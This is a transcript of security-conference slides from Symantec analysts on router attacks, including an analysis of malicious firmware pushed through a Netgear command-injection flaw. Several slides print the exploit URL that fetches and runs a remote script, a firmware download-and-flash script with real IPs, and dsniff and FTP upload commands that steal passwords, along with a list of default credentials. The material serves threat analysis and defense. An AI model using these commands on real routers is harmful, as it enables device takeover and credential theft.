the router of all evil: more than just default …...•netgear router attack •remote flashing of...
TRANSCRIPT
![Page 1: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/1.jpg)
The router of all evil: More than just default passwords and silly scripts
Himanshu Anand & Chastine Menrige
Threat Analysis Engineer
![Page 2: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/2.jpg)
Special Thanks
Copyright © 2014 Symantec Corporation2
• Karthikeyan Kasiviswanathan
This work would not have been possible without the advice and support
• My whole Team @Symantec
• #MalwareMustDie
![Page 3: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/3.jpg)
About Me
Copyright © 2014 Symantec Corporation3
• Working as Threat Analysis Engineer with IPS Operations
• Hobbies are exploit dev, exploit analysis, reversing, AI, CTF…
![Page 4: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/4.jpg)
Introduction to Router
Copyright © 2014 Symantec Corporation 4
![Page 5: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/5.jpg)
Copyright © 2014 Symantec Corporation5
![Page 6: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/6.jpg)
Basic structure
Copyright © 2014 Symantec Corporation6
Routing Engine
Packet Forwarding
Engine
Packets out
Packets in
![Page 7: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/7.jpg)
Importance of Routers
• Serves as the default gateway for computers on LAN
• Helps restrict traffic by limiting hosts to communicate through broadcast
• Capable of wireless access point, allowing them to broadcast a Wi-Fi signal to surrounding devices
• Serves an ideal location for additional network services such as firewall.
Copyright © 2014 Symantec Corporation7
![Page 8: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/8.jpg)
Remember this
Copyright © 2014 Symantec Corporation8
![Page 9: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/9.jpg)
Copyright © 2014 Symantec Corporation9
![Page 10: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/10.jpg)
Copyright © 2014 Symantec Corporation10
![Page 11: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/11.jpg)
Copyright © 2014 Symantec Corporation11
What’s common in the last 3 slides.
![Page 12: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/12.jpg)
Why attack routers
Copyright © 2014 Symantec Corporation 12
![Page 13: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/13.jpg)
Copyright © 2014 Symantec Corporation13
![Page 14: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/14.jpg)
Why attack routers
• For DDoS
• Harvesting credentials
• Sniffing all the network traffic
• Injecting advertisement
Copyright © 2014 Symantec Corporation14
![Page 15: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/15.jpg)
Attacking Routers
Copyright © 2014 Symantec Corporation 15
![Page 16: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/16.jpg)
Attack Vectors
1 Default password
2 DNS changer
3 Exploit Frameworks
Copyright © 2014 Symantec Corporation16
![Page 17: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/17.jpg)
Default password
Copyright © 2014 Symantec Corporation17
![Page 18: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/18.jpg)
Top Default passwords
Copyright © 2014 Symantec Corporation18
Top user names Top passwords
root admin
admin root
DUP root 123456
ubnt 12345
access ubnt
DUP admin password
test 1234
oracle test
postgres qwerty
pi raspberry
![Page 19: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/19.jpg)
DNS changer
Copyright © 2014 Symantec Corporation19
![Page 20: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/20.jpg)
Famous Router Attacks
Copyright © 2014 Symantec Corporation20
• Hacking-Team ]HT[ Takedown
![Page 21: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/21.jpg)
Equation group dump
Copyright © 2014 Symantec Corporation21
![Page 22: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/22.jpg)
Types of malwares
1 Script base Malwares
2 Compiled binary's : ELF
3 Firmware
Copyright © 2014 Symantec Corporation22
![Page 23: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/23.jpg)
Script base malware
– Shellshock exploitation (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187), which was used to compromise routers and infect them with .ELF malware, as well as infect them using Perl-based IRC bots.
Copyright © 2014 Symantec Corporation23
![Page 24: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/24.jpg)
Common traits
Copyright © 2014 Symantec Corporation24
![Page 25: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/25.jpg)
Compiled binary's
– Mirai
– which was a worm and was targeting default routers passwords
Copyright © 2014 Symantec Corporation25
![Page 26: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/26.jpg)
Firmware
• Netgear Router Attack
• Remote flashing of firmware.
• The Netgear router attack (CVE-2016-6277) and the analysis of malicious firmware associated with it, which was flashed remotely, as well as the use of the Firmware Mod Kit (FMK) for the development of malicious firmware.
Copyright © 2014 Symantec Corporation26
![Page 27: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/27.jpg)
Exploit
• http://<IPADDRESS>/cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS\2;cd$IFS\/tmp;wget$IFS\http:\/\/<IPADDRESS>\/h\/wrt\/uge.sh;chmod$IFS\777$IFS\/tmp/uge.sh;/bin/sh$IFS\/tmp/uge.sh
Copyright © 2014 Symantec Corporation27
![Page 28: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/28.jpg)
Shell Script
#cd /tmp
##!!!!!! wget http://178 .57.115.231:8081/h/wrt/custom_image_00021.bin &
wget http://94 .156.35.78/h/wrt/112.bin &
process_id=$!
wait $process_id
write 112.bin linux
/sbin/reboot
Copyright © 2014 Symantec Corporation28
![Page 29: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/29.jpg)
Binwalk
Copyright © 2014 Symantec Corporation29
![Page 30: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/30.jpg)
Directory structure
• │ ├── fstab
• │ ├── group -> /tmp/etc/group
• │ ├── hosts -> /tmp/hosts
• │ ├── init.d
• │ │ ├── rcS
• │ │ └── S01dummy
• │ ├── ipkg.conf
Copyright © 2014 Symantec Corporation30
![Page 31: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/31.jpg)
Inside the Script
• “/usr/bin/wput )cat /tmp/h5.sh | cut -c 1-4).)date +%H-%M-%d-%m-%y)_)cat /tmp/i5.sh).txt ftp://sammy:[email protected]/mnt/hdd/backup/ds/ &”. It looks like the command is uploading some text file to the ftp server with filename formatted like “<COUNTRY’S FIRST 4 LETTER>.<DATE IN DD MM YY>.<IPADDRESS OF THE DEVICE>.txt” to “ftp:// 94.156.35.78/mnt/hdd/backup/ds/”
Copyright © 2014 Symantec Corporation31
![Page 32: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/32.jpg)
What it was Uploading
• “/usr/sbin/dsniff -i )nvram get lan_ifname) >/tmp/ds/ds5.txt”
• The tool is configured to sniff passwords and push them to a text file. This file is what is later uploaded to the ftp
Copyright © 2014 Symantec Corporation32
![Page 33: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/33.jpg)
Inside the FTP
Copyright © 2014 Symantec Corporation33
![Page 34: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/34.jpg)
Demo
Copyright © 2014 Symantec Corporation 34
![Page 35: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/35.jpg)
Best Practices
• Keep the firmware of your router updated
• Do not use Default passwords
• Try using strong and unique passwords for router login
Copyright © 2014 Symantec Corporation35
![Page 36: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/36.jpg)
Copyright © 2014 Symantec Corporation 36
![Page 37: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/37.jpg)
&Q A
Copyright © 2014 Symantec Corporation 37
![Page 38: The router of all evil: More than just default …...•Netgear Router Attack •Remote flashing of firmware. •The Netgear router attack (CVE-2016-6277) and the analysis of malicious](https://reader034.vdocuments.net/reader034/viewer/2022042319/5f08d8027e708231d423fe6f/html5/thumbnails/38.jpg)
Thank you!
SYMANTEC PROPRIETARY/CONFIDENTIAL – INTERNAL USE ONLYCopyright © 2014 Symantec Corporation. All rights reserved.
Himanshu Anand